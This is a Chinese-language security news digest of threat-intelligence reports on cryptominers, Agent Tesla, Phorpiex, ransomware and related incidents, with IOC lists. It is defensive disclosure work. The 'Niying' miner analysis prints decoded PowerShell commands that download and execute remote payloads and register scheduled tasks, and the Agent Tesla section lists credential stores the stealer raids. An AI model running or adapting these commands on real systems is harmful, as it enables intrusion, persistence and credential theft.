分类: 恶意软件

“贪吃蛇”挖矿木马升级提权工具,对企业网络威胁加剧​

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/QBkjAGuGBIZ7yzDNEYhxOg   概述 “贪吃蛇”挖矿木马曾在2019年4月被腾讯安全团队发现,因其在感染服务器后即会清除其他挖矿木马独占服务器资源而得名。“贪吃蛇”挖矿木马团伙主要针对MS SQL服务进行爆破弱口令攻击,爆破成功后会进行提权攻击获得系统权限,然后植入门罗币挖矿木马以及大灰狼远控木马。 “贪吃蛇”挖矿木马新变种的攻击流程 该团伙在2019年也对木马进行过一次更新,但第二个版本中被其他团队植入了后门(黑吃黑也是传统套路)。腾讯安全团队本次捕获的“贪吃蛇”挖矿木马新版在攻击流程上与前面略有区别。首先病毒对提权工具进行更新,抛弃了2015及以前的提权漏洞,引入2019年新的提权漏洞,病毒爆破成功之后提权获得系统权限的概率得以大幅提升。 “贪吃蛇”新版本清理的竞品挖矿木马也比旧版更多, 病毒还会添加Windows防火墙规则阻止其他挖矿木马入侵。攻击流程上也有所简化,不再借用第三方大厂的白文件,而是直接劫持系统进程或服务进行攻击。 腾讯安全T-Sec终端安全管理系统及腾讯电脑管家均可查杀该病毒,腾讯安全专家建议企业网管尽快纠正MS SQL服务器存在的弱口令风险,避免黑客远程爆破成功。 详细分析 攻击团伙对MS SQL服务器爆破成功后,会直接下载提权模块攻击以获取系统最高权限。与第一版贪吃蛇不同的是,第一版提权完成后会从网络上下载后续功能模块,而新版中在提权模块中直接包含后续的功能模块,大部分内嵌在PE中。 新版内嵌PE会存放在数据段 而旧版本是内嵌在资源段中 流程开始后首先释放提权模块,罗列了一下新版贪吃蛇与旧版使用的提权工具区别,提权漏洞升级了。 旧版本: 新版本: 提权工作完成后,释放SQLA.exe文件,该文件内置6个PE文件,其中2个文件是密文形式存放,逐个分析其功能。 Rundllexe.Dll:这个dll有内嵌x64版本,会被注册为打印机程序 Dll启动rundllexe.Exe Rundllexe.exe启动后把大灰狼远控注入到svchost中 大灰狼模块被释放到C:\Windows\MpMgSvc.dll中 C2: down.361com.com 备份rundll代码到注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ODBC\Rundll 接着下载x64.exe,hxxp://124.160.126.238/1.exe,这个模块主要用来投递挖矿木马,入口处通过修改Windows防火墙规则,阻止其他挖矿木马入侵。 解密出active_desktop_render.dll释放到c:\windows\help\ active_desktop_render.dll会把自身注册为服务,服务名GraphicsPerf_Svcs active_desktop_render.dll内置一个PE文件,解密后得到DeskTop EXE.主要负责投递挖矿木马,首先下载hxxp://118.45.42.72/Update.txt,文件中描述了挖矿木马名称及大小。 还需要根据配置描述,清除其他竞品挖矿木马 “加固清理”之后下载挖矿木马hxxp://www.362com.com/32.exe,并设置挖矿启动项,挖矿木马使用的文件名和系统文件名一样,以便伪装。 TrustedInsteller.exe WmiApSvr.exe WUDFhosts.exe HelpSvc.exe 劫持这4个系统文件,提高存活几率: 矿池及钱包仍然异或加密存储在文件中 矿池:pool.usa-138.com:80 钱包:4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S 清除其他挖矿木马也更加全面 IOCs MD5 3841eed7224b111b76b39fe032061ee7 a865ec970a4021f270359761d660547c 70e694d073c0440d9da37849b1a06321 4a72e30c0a582b082030adfd8345014f 645564cf1c80e047a6e90ac0f2d6a6b7 ce614abf6d6c1bbeefb887dea08c18a3 f03f640de2cb7929bbbafa3883d1b2a9 5d2e9716be941d7c77c05947390de736 3a1e14d9bbf7ac0967c18a24c4fd414b dc60a503fb8b36ab4c65cdfa5bd665a1 9450249ae964853a51d6b55cd55c373e f4f11dc6aa75d0f314eb698067882dd5 18936d7a1d489cb1db6ee9b48c6f1bd2 b660ad2c9793cd1259560bbbfbd89ce6 2ee0787a52aaca0207a73ce8048b0e55 URLs hxxp://www.362com.com/32.exe hxxp://www.362com.com/64.exe hxxp://118.45.42.72/Update.txt hxxp://118.45.42.72/22.exe hxxp://www.362com.com/Update.txt hxxp://124.160.126.238/1.exe hxxp://124.160.126.238/tq.exe hxxp://124.160.126.238/11.exe hxxp://124.160.126.238/Down.exe hxxp://124.160.126.238/MSSQL.exe Domain www.361com.com www.362com.com 22ssh.com IP 124.160.126.238 (ZoomEye搜索结果) 118.45.42.72 (ZoomEye搜索结果)

AcidBox:Turla Group 开发的针对俄罗斯组织的恶意软件

2014年一个名为Turla Group的恶意软件组织消息出现,爱沙尼亚外交情报局推断它源于俄罗斯,代表俄罗斯联邦安全局(FSB)进行运作,该组织核心恶意软件也被公开描述为第一个滥用第三方程序来禁用DSE的案例。在Windows Vista中引入了这种安全机制,以防止未签名的驱动程序加载到内核空间。Turla利用了签名的VirtualBox驱动程序——VBoxDrv.sysv1.6.2来停用DSE,然后对未签名的有效负载驱动程序进行加载。 然而,这个漏洞有一些混淆,它被称为CVE-2008-3431。Turla使用的漏洞实际上滥用了两个漏洞,其中只有一个在前面提到的CVE中被修复过。另一个漏洞与CVE-2008-3431一起用在第一个攻击版本中,第二个攻击版本大约在2014年引入了内核模式恶意软件,其只使用了未修补的漏洞,我们将在后面详细讨论。 2019年2月,Unit 42发现了尚未知晓的威胁因素(信息安全社区不知道),发现第二个未修补的漏洞不仅可以利用VirtualBox VBoxDrv.sys驱动程序 v1.6.2,还可以利用 v3.0.0以下的所有其他版本。此外我们研究发现这个未知的参与者利用VirtualBox驱动程序2.2.0版,在2017年攻击至少两个不同的俄罗斯组织。我们猜测这样做是因为驱动程序版本2.2.0并不易受攻击,因此很可能不会被安全公司发现。由于没有发现其他受害者,我们认为这是一个非常罕见的恶意软件,仅用于目标攻击。 操作者使用了一个之前未知的恶意软件家族,我们称之为AcidBox。由于该恶意软件的复杂性、稀有性以及它是一个更大的工具集的一部分这一事实,我们相信它被高级威胁参与者用于定向攻击。如果攻击者仍然活跃的话,这个恶意软件很可能今天仍在使用。但是,我们预计它在一定程度上被重写了。根据我们掌握的信息,我们认为除了使用过的漏洞之外,这个未知的威胁因素与Turla无关。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1247/     消息来源:paloaltonetworks,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Agent Tesla 商业木马正通过钓鱼邮件传播,木马生成器已十分成熟

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/1aQGlBxBwBOrdrW3B9l4tA   背景 腾讯安全威胁情报中心检测到有Agent Tesla商业木马变种正在通过钓鱼邮件传播。攻击者伪装成某国大型航运公司发送以货运单据为主题的钓鱼邮件,并在附件中加入由木马打包而成的压缩程序。 使用C#编译的木马外壳首先从资源文件中读取和加载Load程序PhotoDirector.dll,攻击者采用隐写技术,将木马执行程序隐藏在图片资源中,从图片资源中读取、解密得到Agent Tesla木马的exe可执行程序。 Agent Tesla为一款知名的商业窃密木马,木马执行后,会从资源中解密出现核心窃密程序,窃取中毒电脑的机密信息。包括:键盘记录,截屏,剪贴板记录,以及摄像头图像。还会从电脑上提取还原多种登录信息缓存,包括浏览器中保存的各网站登录帐号和密码,邮件客户端中保存的用户名密码,FTP工具、下载器中保存的密码等等。 窃取的数据通过Web Panel的方式回传至C&C服务器。一切完成之后,该木马会删除自身,清理痕迹。 腾讯安全专家建议用户小心处理不明电子邮件附件,腾讯安全旗下的系列产品均可检测、查杀Agent Tesla系列窃密木马。 样本分析 伪装成某国航运公司发送的以货运单据为主题的钓鱼邮件,附件名为“BL Draft Copy-shipping DocumentsEXCEL.XLS.xlsx.gz.zip”。 伪造的发件邮箱tassgroup.com属于TRANS ASIA GROUP公司,该公司是南亚某国一家集造船、航运、集装箱、物流等业务为一体的集团公司。 附件解压得到exe程序“BL Draft Copy-shipping DocumentsEXCEL.XLS.xlsx.gz.exe”,是木马外壳程序,采样C#编写。 外壳程序被命名为BlackJack。 Main函数进入Form1,完成初始化后调用BCAS类中BCAS()函数,代码被插入大量无效指令。 在无效指令之后调用AIJISAJIS(),进行资源文件的解密和加载。 BlackJack共有两个资源文件,一个是二进制文件资源“PhotoDirector_2”,另一个是图片文件资源“cxpjNoVVdqvwNYmThlfPxwKQGrxcLPY”。 首先将二进制文件作为PhotoDirector.dll加载到内存,该dll采样C#编写,主要功能是从母体的中获得图片资源,从图片中解密出数据,利用自定义的异或算法处理数据后得到Agent Tesla家族的exe文件,并在内存中加载执行。 获取图片中数据的代码为:首先遍历图片中的每个像素点,对每个像素点的RGB数据依次排列。 然后对读取到的数据利用自定义异或算法进行解密。 解密得到Agent Tesla木马ReZer0V2.exe,木马同样采样C#编写,其字符串经过混淆,仍然有两个资源文件,一个二进制文件“qfwH1”,一个XML文件XML。 拷贝自身到%Romaing%\XLwdDWHDKFdwB.exe目录下,并利用资源中的XML文件安装执行木马的计划任务Updates\XLwdDWHDKFdwB,在系统每次登陆时执行一次: 从“qfwH1”资源中解密出C++编译的核心窃密exe文件,解密算法和上述异或算法相同,然后加载该exe到内存执行。 窃密exe枚举注册表SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall获取系统安装的软件信息: 从注册表中读取FTP服务地址、用户名和密码信息: Software\Far\Plugins\FTP\Hosts Software\Far2\Plugins\FTP\Hosts Software\Far Manager\Plugins\FTP\Hosts Software\Far\SavedDialogHistory\FTPHost Software\Far2\SavedDialogHistory\FTPHost Software\Far Manager\SavedDialogHistory\FTPHost 从XML文件sitemanager.xml、filezilla.xml、recentservers.xml中获取FTP服务地址、用户名和密码信息 读取wiseftpsrvs.ini、wiseftp.ini、32BitFtp.ini、ftpsite.ini等INI文件中保存的FTP账号密码信息 从注册表中获取ExpanDrive网盘的账号密码信息: 获取Windows Live Mail、Outlook、RimArts、Pocomail、IncrediMail 、The Bat!等邮箱客户端保存的账号密码信息: 从Chrome等浏览器中获取用户账号密码信息: 将敏感信息加密后发送至http[:]//chelitos.com.ve/folders/folder/bin/trash/panel/gate.php 窃取任务完成后,创建bat脚本执行自删除: 木马生成器 1、工具简介 攻击者生成木马时使用的自动化工具名为AgentTesla,是一个功能比较完整的恶意木马生成器,生成器作者已经开始通过出售工具帐号牟利。 2、使用.NET作为开发语言 .NET语言开发的程序中包含经过编译的字节码,在.NET环境中进行解释和执行,这就给样本的调试和分析带来了一定的困难。同时,.NET库中拥有丰富的工具类,在迅速搭建可用的程序方面具有一定的优势。 3、支持多类信息窃取行为 工具可以自定义生成的木马窃取的信息,包括键盘记录,截屏,剪贴板记录,以及摄像头图像。工具使用者还可以自定义记录的抓取间隔时间。 同时,工具还可以从电脑上提取还原多种登录信息缓存,包括浏览器中保存的网站帐号密码,邮件客户端中保存的密码,FTP工具、下载器中保存的密码等。 4、支持多种回传方式 工具可以自定义木马将窃取到的信息回传给木马传播者的方式,包括网络接口方式、邮件方式以及FTP方式。 在FTP方式下,工具使用者可以指定上传信息时用到的ftp地址、用户名和密码。 在邮件方式下,工具使用者可以指定邮箱服务器地址、用户名和密码。 如果使用者采用网络接口方式,则需要从工具官网下载一套完整的管理页面,并部署在自己的网站上。本次攻击中采用这种方式,使用者将chelitos.com.ve作为C&C服务器,生成的木马运行后会连接该服务器并接收相应的指令。 5、木马与服务器之间传递的指令包括: IOCs MD5 a2bf53ed2269b816d8c28e469e8c2603 adfd08c1928106a23c6ef0464885dfb9 URL http[:]//chelitos.com.ve/folders/folder/bin/trash/panel/gate.php http[:]//chelitos.com.ve/shit.exe 参考链接: https://www.freebuf.com/column/149525.html

NetWalker 勒索软件相关分析

Netwalker (又名 Mailto)勒索软件近期十分活跃。 由于新型冠肺炎的爆发,一些活跃的勒索软黑客们开始不再攻击医疗目标,但NetWalker 勒索软件却是例外。 这款勒索软件的赎金要求很高,很多受害者们因无法支付相关赎金导致数据被泄露。 最近美国的教育机构也成为了勒索软件的重点攻击目标,密歇根州立大学、加州大学旧金山分校和哥伦比亚大学芝加哥分校都没有幸免。近期的RaaS(勒索软件即服务)模式转变加剧了勒索的范围,导致网络检测和清理不再足以确保组织数据机密的安全,预防成为了面对威胁的唯一解决办法。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1243/     消息来源:sentinelone,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

TA410:针对美国公用事业部门的攻击组织再出新的恶意软件

去年8月,Proofpoint研究人员发现LookBack恶意软件在该年7月至8月间针对美国公用事业部门发起了网络攻击。通过分析8月21日至29发起的活动发现,这些攻击活动还利用恶意宏向美国各地的攻击目标发送恶意软件。与此同时,研究人员还发现了一个全新的恶意软件家族FlowCloud,这个家族也被交付给了美国的公用事业提供商。 像LookBack这样的FlowCloud恶意软件可以使攻击者完全控制受感染的系统。它的远程访问木马(RAT)功能包括访问已安装的应用程序、键盘、鼠标、屏幕、文件和服务进程,并通过这些命令控制来泄露信息。 通过观察2019年7月至11月间的网络钓鱼活动,基于威胁参与者使用共享附件宏、恶意软件安装技术和重叠交付基础结构我们可以确定LookBack和FlowCloud恶意软件都归因于我们称为TA410的威胁参与者。 此外,我们还发现TA410和TA429(APT10)之间的相似之处。具体来讲,他们之间有共同的附件宏,而且2019年11月检测到的TA410活动中还包括网络钓鱼附件传递宏中使用的与TA429(APT10)相关的基础结构。但是,Proofpoint分析师认为,黑客们可能是在故意使用TA429(APT10)技术和基础架构来进行虚假标记。因此,在进行研究时我们不会将LookBack和FlowCloud活动归因于TA429(APT10)。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1241/     消息来源:proofpoint, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

遭遇勒索软件攻击 本田暂停工厂生产并关闭办公室

据外媒报道,本田的全球业务受到了勒索软件攻击,这家日本汽车制造商仍在努力让一切恢复正常。该家公司于当地时间周二表示,它将不得不暂时关闭部分生产设施,另外客户和金融服务业务也已经被关闭。本田在向The Verge发表的一份声明中说道:“目前没有证据表明个人身份信息丢失。我们大多数工厂都已恢复生产,目前正在努力恢复我们在俄亥俄州的汽车和发动机工厂的生产工作。” 据了解,本田遭到的网络攻击所使用的是被认为是被叫做Snake的勒索软件。通过它,黑客可以对遭到攻击的公司的文件进行加密将其作为勒索筹码。根据The Verge网站看到的一条信息显示,本田在其内部警报系统中将其称为“重大电脑勒索软件病毒攻击”。“来自全球和跨NA地区的IT团队正在持续工作以遏制这次攻击(带来的影响),另外还在尽快恢复正常的业务操作,但许多依赖于信息系统的业务流程仍受到了影响。” 据Twitter上的投诉显示,虽然本田表示一些工厂正在重新开工,但业主无法进行在线支付或进入公司的客户服务网站。该公司北美最大的客户和金融服务办公室的一名员工告诉The Verge,临时员工在办公室关闭时是没有工资的。 即使系统已经备份,本田美国客户和金融服务办公室的许多员工也无法远程工作。正如The Verge在5月份报道的那样,这意味着在大流行期间,许多员工不得不去办公室,对此一些员工担心公司在阻止新冠病毒传播方面做得不够。不过在过去几周,这些办公室的员工告诉The Verge,本田终于开始实行体温检测、加强社交距离,并且在某些地区地方允许更多的人远程工作。     (稿源:cnBeta,封面源自网络。)

Phorpiex 僵尸网络病毒新增感染可执行文件

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/sRE5CyyEutzs_Z9BDdyGnA 一、概述 腾讯安全团队检测到Phorpiex僵尸网络病毒在国内近期较为活跃,该病毒的新版本增加了对感染32位PE文件(一种可执行文件)的能力,被感染的可执行文件被添加.zero恶意后门节代码,同时该病毒移除了检测虚拟机环境的相关代码。当已被感染的32位PE文件(通常是EXE可执行程序文件)在正常无毒的电脑中运行时,将会下载执行Phorpiex病毒主模块,实现病毒在不同电脑之间的感染传播。腾讯安全还检测到Avaddon勒索病毒使用Phorpiex僵尸网络的基础设施分发投递。 PE感染特性将导致Phorpiex僵尸网络病毒增加更多传播途径,如:已被感染的PE可执行文件可能通过移动设备的交换传播;带毒程序如果感染网站服务器,访客电脑可能通过网站下载被感染。 我们知道,感染型病毒曾经在WinXp之前的时代比较多见,现在已很少见,网民对这类病毒变得比较陌生,会有利于Phorpiex僵尸网络病毒通过网络或移动存储介质交换感染扩散。 Phorpiex僵尸网络传播途径较多,总结一下,主要有以下几种: 通过被感染的U盘、移动硬盘传播; 通过网站Web服务目录下被替换的文件下载传播; 通过被感染的压缩包文件传播; 通过VNC爆破传播; 通过感染32位PE可执行程序文件传播(新增) Phorpiex僵尸网络病毒主要通过投递、分发其它恶意病毒木马来获利。包括:挖矿木马、盗窃虚拟币的木马、群发诈骗邮件敲诈虚拟币、为其他勒索病毒提供分发渠道等等。腾讯T-Sec终端管理系统(御点)及腾讯电脑管家均可查杀Phorpiex僵尸网络病毒。 二、样本分析 被感染文件: 观察被感染后的文件可知新增了.zero节数据,运行被感染的可执行文件将会首先执行新增的恶意代码部分,再跳转到OEP处执行程序的原始功能,从而实现新的感染。 新增节内感染代码首先判断%appdata%\winsvcs.txt文件是否存在,文件属性是否隐藏。winsvcs.txt名的隐藏文件为Phorpiex病毒攻击成功后的标记文件,病毒通过检测该文件的属性来避免对已中毒主机的反复感染。 当感染代码判断该主机未被感染过,则从C2地址:88.218.16.27处拉取pe.exe模块到tmp目录执行,该文件后分析为Phorpiex病毒主文件。 拉取执行PE.exe病毒主文件完毕后,感染代码最终通过 PEB->ldr->InLoadOrderModuleList获取到当前模块基址后计算出原始未感染前入口代码地址跳转执行,以确保感染病毒后的可执行程序能正常运行。 Phorpiex僵尸网络主病毒文件: 88.218.16.27处拉取的pe.exe模块同样为加壳程序文件,内存Dump后可知,该模块为Phorpiex僵尸网络主传播模块。 该版本的Phorpiex主模块相比较老版本,在入口处的环境检测中相关代码中,将反虚拟机功能取消,只保留了反调试功能,这也意味着虚拟机环境下Phorpiex病毒也会从C2服务器下载恶意代码运行。 该版本的Phorpiex除作为downloader推广其它恶意程序外,自身主要创建4个功能线程: 线程1(老功能) 线程2(老功能) 线程3:(老功能) 线程4(新增) 感染文件过程过程是在%systemdrive%系统盘内展开的 感染目标为后缀.exe的PE类型文件,同时如果系统目录内文件绝对路径包含以下关键字符,不对其进行感染。以免感染到系统文件导致程序运行出错,从而避免被用户过早发现。 病毒感染时会排除含以下关键词的目录:windows,sys,$recycle.,service,intel,micro,boot,driver,recovery,update,drv。 文件名感染排除关键词:.exe.,win,sys,drv,driver,$,drivemgr.exe等。 感染过程采取文件映射方式,根据其感染代码可知,病毒对PE-64进行了排除,只感染32位文件。虽然如此,但由于当前Windows平台下多数软件为了兼容性未提供x64版本,故病毒依旧能够感染到大量的文件。病毒感染完成后会将内置的zero_code代码作为附加节数据添加到被感染文件中,zero_code中硬编码了一个0xCCCCCCCC常量,该常量在zero_code节代码拷贝完成后进行动态查找然后修改为原始程序OEP。 Avaddon勒索病毒与Phorpiex僵尸网络的关联 腾讯安全还捕获到通过邮件附件传播的伪装成图片的恶意样本。 附件包内图片扩展名的隐藏文件,实际为js脚本文件,只需要在文件夹选项中打开查看已知文件的扩展名。 脚本文件将会使用Poweshell或者Bitadmin尝试从217.8.117.63地址下载名为jpr.exe的文件执行,该投递方式疑为Phorpiex僵尸网络的手法。 通过腾讯安图大数据威胁情报管理可知,IP:217.8.117.63,确实为Phorpiex僵尸网络基础设施。 下载的jpr.exe经鉴定为新型Avaddon勒索病毒。 IOCs MD5: e28c6a5e9f89694a0237fe4966a6c32c 04deb3031bd87b24d32584f73775a0a8 4c7b7ce130e2daee190fc88de954292d c9ec0d9ff44f445ce5614cc87398b38d IP: 88.218.16.27 217.8.117.63 Domain: tldrbox.top tldrbox.ws URL: hxxp://88.218.16.27/1 hxxp://88.218.16.27/2 hxxp://88.218.16.27/3 hxxp://88.218.16.27/4 hxxp://88.218.16.27/5 hxxp://88.218.16.27/v hxxp://tldrbox.top/1 hxxp://tldrbox.top/2 hxxp://tldrbox.top/3 hxxp://tldrbox.top/4 hxxp://tldrbox.top/5 hxxp://tldrbox.top/v hxxp://tldrbox.ws/1 hxxp://tldrbox.ws/2 hxxp://tldrbox.ws/3 hxxp://tldrbox.ws/4 hxxp://tldrbox.ws/5 hxxp://tldrbox.ws/v hxxp://217.8.117.63/jpr.exe 参考链接 https://mp.weixin.qq.com/s/zbqLmCBblvbZQwsM2XJd2Q https://mp.weixin.qq.com/s/3kyLkoBd9K-5_VSk5Nnb6A            

骗子利用 COVID-19 危机通过电子邮件发送恶意软件

骗子看上去无所不能,甚至可以利用COVID-19大流行病。根据最近的一份报告,网络犯罪分子正在使用假简历和医疗休假表格来传播银行木马和窃取信息的恶意软件。自3月以来,已有超过4000万美国人首次申请失业救济,虽然目前失业率从高峰期开始下降,但仍维持在13.3%的水平。 Check Point的研究人员发现,不良分子正在趁虚而入。该公司写道,在过去两个月里,以简历为主题的电子邮件恶意活动增加了一倍,每450个恶意文件中就有1个是简历骗局。其中一个活动使用Zloader恶意软件来窃取受害者的证书和其他细节。它隐藏在电子邮件附件的恶意.xls文件中,主题词为 “申请工作 “和 “关于工作”。如果有人打开了其中一个文件,他们会被要求 “启用内容”,这时一个恶意的宏就会开始运行并下载最终的有效载荷。 另一个电子邮件活动利用了COVID-19相关病假。这些邮件的主题语为 “以下是一份员工申请表格,要求在家庭和医疗假期法案(FMLA)范围内休假”,通常包含medical-center.space 的发件人域名,它们包含Icedid恶意软件,这是另一种银行木马。 由于很多企业在封锁期间关闭,5月份与冠状病毒相关的网络攻击比4月份下降了7%,但在6月份企业重新开业后,整体网络攻击猛增16%。在过去的四周里,也有2000个恶意或可疑的冠状病毒相关域名注册。对此,安全人员要求用户永远不要打开可疑的电子邮件附件。     (稿源:cnBeta,封面源自网络。)

“匿影”挖矿木马持续活跃,入侵某旅游网站做病毒下载服务器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/WoYcqgC-xXtM2s752215yQ 一、背景 腾讯安全威胁情报中心检测到“匿影”挖矿木马变种攻击。该变种木马依然利用永恒之蓝漏洞进行攻击传播,通过计划任务、WMI后门进行本地持久化,然后在攻陷机器下载XMRig矿机挖矿门罗币、下载nbminer矿机挖矿HNS(Handshake),还会利用regsvr32.exe加载执行DLL形式的木马程序,匿影木马新变种在已安装腾讯电脑管家等数款安全软件的电脑上不运行,试图避免被安全厂商检测到。 “匿影”挖矿木马擅长利用利用各类公共网址进行数据统计和木马下载,此次变种攻陷了某旅游文化网站并将其作为木马下载服务器,其使用过的公共网址如下: upload.ee 免费网盘 anonfiles.com 免费图床 sowcar.com 免费图床 popo8.com 免费图床 img.vim-cn.com 免费图床 urlxxx.at.ua 建站服务 mywebnew.ucoz.pl 建站服务 addressnet.do.am 建站服务 googlenew.moy.su 建站服务 ludengapp.com 某设计公司网站 worldyou.top 某文旅公司网站(新) 二、样本分析 “匿影”挖矿木马释放永恒之蓝漏洞利用攻击程序包到C:\Users\Public目录下并启动主程序storageg.exe开始扫描攻击。   在攻陷的目标机器执行Payload(x86.dll或x64.dll), Payload会检测腾讯电脑管家、金山毒霸等杀软是否存在,若不存在继续执行一段Base64编码的Powershell命令。 Base64编码的Powershell命令解码后内容如下: schtasks /create /ru system /sc MINUTE /mo 80 /tn VNware /tr "powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBtAHkAdwBlAGIAcwBhAGEAdAAuAHgAeQB6AC8AdgBpAHAALgB0AHgAdAAnACkAKQA=" 该命令安装名为“VNware ”的计划任务,每隔80分钟执行一次另一段经过base64编码的Powershell命令,同样,解码后内容如下: IEX ((new-object net.webclient).downloadstring('http[:]//mywebsaat.xyz/vip.txt')) 然后计划任务从http[:]//mywebsaat.xyz/vip.txt下载vip.txt反复运行,并完成以下功能: 1、访问统计页面,记录攻击次数 2、安装计划任务“PCHunterDNS”和”\Microsoft\Windows\UPnP\Services”进而持久化执行恶意代码: IEX ((new-object net.webclient).downloadstring('https[:]//mywebsaat.xyz/123.jpg')) 3、通过注册表修改操作,关闭Windows Defender,同时开启WDigest缓存(可以从内存缓存中窃密用户名和登陆密码)。 在执行该步骤前,脚本会从百度官网下载LOGO图标https[:]//www.baidu.com/img/bd_logo1.png,并保存为C:\ProgramData\Defender.txt,通过判断该文件是否存在,来确认这个步骤是否执行过。 4、安装WMI后门(事件过滤器“fuckamm3”、事件消费者“fuckamm4”)持久化运行恶意代码IEX ((new-object net.webclient).downloadstring(‘http[:]//mywebsaat.xyz/kp.txt’)),而“fuckamm3”、“fuckamm4”是Mykings挖矿僵尸网络团伙使用的WMI后门名称,推测“匿影”挖矿木马团伙与Mykings挖矿僵尸网络可能有一定的关联。 5、下载和启动挖矿程序,脚本会从多个地址下载不同的挖矿程序,存放在不同的路径下,具体样本如下: C:\Users\Public\MicrosftEdgeCP.exe是显卡挖矿软件NBMiner (https://github.com/NebuTech/NBMiner/releases),支持NVIDIA、AMD显卡,支持GRIN、AE、CKB、SERO、SIPC、BTM、ETH、SWAP等币种的挖矿。 其中某旅游文化公司网站也被黑客攻陷作为挖矿木马下载服务器: WMI后门中的Powershell脚本kp.txt还会下载DLL木马https[:]//rss.mywebsaat.xyz/cccdll.jpg并利用regsvr32.exe加载执行,然后通过该DLL启动挖矿木马。 new-object System.Net.WebClient).DownloadFile( 'https[:]//rss.mywebsaat.xyz/cccdll.jpg','C:\Users\Public\eos.dll') `Start-Process -FilePath C:\Windows\SysWOW64\regsvr32.exe '/s C:\Users\Public\eos.dll'` 完成挖矿木马启动和持久化过程后,继续下载永恒之蓝攻击模块http[:]//rss.mywebsaat.xyz/yh.jpg,启动下一轮攻击: IOCs Domain mywebsaat.xyz rss.mywebsaat.xyz URL https[:]//www.upload.ee/files/11799957/1.txt.html https[:]//www.upload.ee/files/11814903/1.txt.html https[:]//www.upload.ee/files/11815494/1.txt.html https[:]//www.upload.ee/files/11816420/1.txt.html https[:]//www.upload.ee/files/11816445/1.txt.html https[:]//www.upload.ee/files/11822214/1.txt.html http[:]//mywebsaat.xyz/999.jpg https[:]//mywebsaat.xyz/xmr.jpg http[:]//mywebsaat.xyz/nb.jpg http[:]//mywebsaat.xyz/yh.jpg http[:]//mywebsaat.xyzc.jpg http[:]//mywebsaat.xyz/fxtxt.jpg http[:]//mywebsaat.xyzakhost.jpg http[:]//rss.mywebsaat.xyz/xmr.jpg http[:]//rss.mywebsaat.xyzakhost.jpg http[:]//rss.mywebsaat.xyz/nb.jpg http[:]//rss.mywebsaat.xyz/yh.jpg http[:]//rss.mywebsaat.xyzc.jpg http[:]//rss.mywebsaat.xyz/fxtxt.jpg https[:]//mywebsaat.xyz/cccdll.jpg http[:]//mywebsaat.xyz/kp.txt https[:]//mywebsaat.xyz/123.jpg http[:]//www.worldyou.top/images/xmr.jpg http[:]//www.worldyou.top/images/tsakhost.jpg http[:]//www.worldyou.top/images/999.jpg http[:]//www.worldyou.top/images/btc.jpg http[:]//www.worldyou.top/images/fxtxt.jpg http[:]//www.worldyou.top/images/nb.jpg http[:]//www.worldyou.top/images/sd.jpg http[:]//www.worldyou.top/images/yh.jpg MD5 33110e53078ed5a0cf440d182878f30b 441a61cdd30502b3fcca03c28ccb49e8 5e20062b94f38e447be60f9f2b0286cd ee5d5f0e0fe7db7186f72d3d5256b1be f4fbfb10c441974ef5b892a35b08e6eb 85f25f9264664111f7df6dc76320b90b

Brave 浏览器因私自插入返利代码而遭到猛烈抨击

基于 Chromium 开发的 Brave 浏览器,近日曝出了自动插入返利代码的问题。当用户搜索加密货币企业时,将被添加重定向代码以获得佣金。Decrypt.co 报道称,币安、Coinbase 和 Trezor 都在其列。事发后,Brave 首席执行官已经作出道歉,承诺今后不会再这么做,且用户能够在 brave://settings 设置页面禁用相关代码。 Twitter 网友 Yannick Eckl 率先曝光了此事,作为一款宣称对加密友好的隐私优先浏览器,Brave 此举确实对自己的声誉造成了极大的损害。 与该公司此前遵循的“选择加入”原则不同,Brave 从未向其 1500 万越活用户解释过此事。即便浏览器上的广告是可选的,且会向任何观看过的用户支付加密货币。 随着 JRR Crypto 高管 Dimitar Dinev 挖掘出了 Brave 重定向代码的更多细节,此事终于引发了一场强烈的舆论风暴。 GitHub 上托管的代码显示,该浏览器还会将用户重定向至 Ledger、Trezor 和 Coinbase 等网站。 最终,Brave 首席执行官兼联合创始人 Brendan Eich 也在 Twitter 上向公众致歉,声称该问题目前“已被修复”,且保证不会再发生类似的行为。 不过截止发稿时,Brendan Eich 尚未回应 Decrypt.co 的进一步置评请求。     (稿源:cnBeta,封面源自网络。)